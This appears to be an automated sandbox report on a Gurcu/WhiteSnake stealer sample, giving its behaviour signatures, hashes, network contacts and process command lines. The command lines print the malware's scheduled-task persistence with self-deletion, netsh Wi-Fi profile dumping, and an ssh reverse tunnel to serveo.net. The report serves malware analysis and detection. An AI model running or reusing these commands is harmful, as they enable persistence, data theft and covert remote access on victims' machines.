Analysis Overview
SHA256
0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Threat Level: Known bad
The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.
Malicious Activity Summary
Detect Gurcu Stealer V3 payload
Gurcu, WhiteSnake
Gurcu family
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Deletes itself
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
outlook_win_path
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
outlook_office_path
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-14 03:47
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gurcu family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-14 03:47
Reported
2023-10-14 19:53
Platform
win7-20230831-en
Max time kernel
152s
Max time network
153s
Command Line
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu, WhiteSnake
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
C:\Windows\system32\taskeng.exe
taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:7396 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp
memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp
memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp
memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp
memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp
memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
| MD5 | d1ce628a81ab779f1e8f7bf7df1bb32c |
| SHA1 | 011c90c704bb4782001d6e6ce1c647bf2bb17e01 |
| SHA256 | 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71 |
| SHA512 | de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f |
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
| MD5 | d1ce628a81ab779f1e8f7bf7df1bb32c |
| SHA1 | 011c90c704bb4782001d6e6ce1c647bf2bb17e01 |
| SHA256 | 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71 |
| SHA512 | de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f |
\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
| MD5 | 79a6e2268dfdba1d94c27f4b17265ff4 |
| SHA1 | b17eed8cb6f454700f8bfcfd315d5627d3cf741c |
| SHA256 | 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5 |
| SHA512 | 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c |
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
| MD5 | 79a6e2268dfdba1d94c27f4b17265ff4 |
| SHA1 | b17eed8cb6f454700f8bfcfd315d5627d3cf741c |
| SHA256 | 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5 |
| SHA512 | 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c |
Analysis: behavioral2
Detonation Overview
Submitted
2023-10-14 03:47
Reported
2023-10-14 19:54
Platform
win10v2004-20230915-en
Max time kernel
114s
Max time network
127s
Command Line
Signatures
Detect Gurcu Stealer V3 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu, WhiteSnake
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.248.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| N/A | 127.0.0.1:4742 | tcp |
Files
memory/2580-0-0x00000215DCD60000-0x00000215DCD84000-memory.dmp
memory/2580-1-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp
memory/2580-2-0x00000215DEC10000-0x00000215DEC20000-memory.dmp
memory/2580-6-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log
| MD5 | 3308a84a40841fab7dfec198b3c31af7 |
| SHA1 | 4e7ab6336c0538be5dd7da529c0265b3b6523083 |
| SHA256 | 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e |
| SHA512 | 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198 |
memory/408-11-0x00007FFF54460000-0x00007FFF54F21000-memory.dmp
memory/408-12-0x00000214C7EE0000-0x00000214C7EF0000-memory.dmp
C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
| MD5 | 35625d89730f70f12ecdeaf795722865 |
| SHA1 | 0fedcad5039e3317d0e434bb038b81850e8f3599 |
| SHA256 | 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5 |
| SHA512 | edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301 |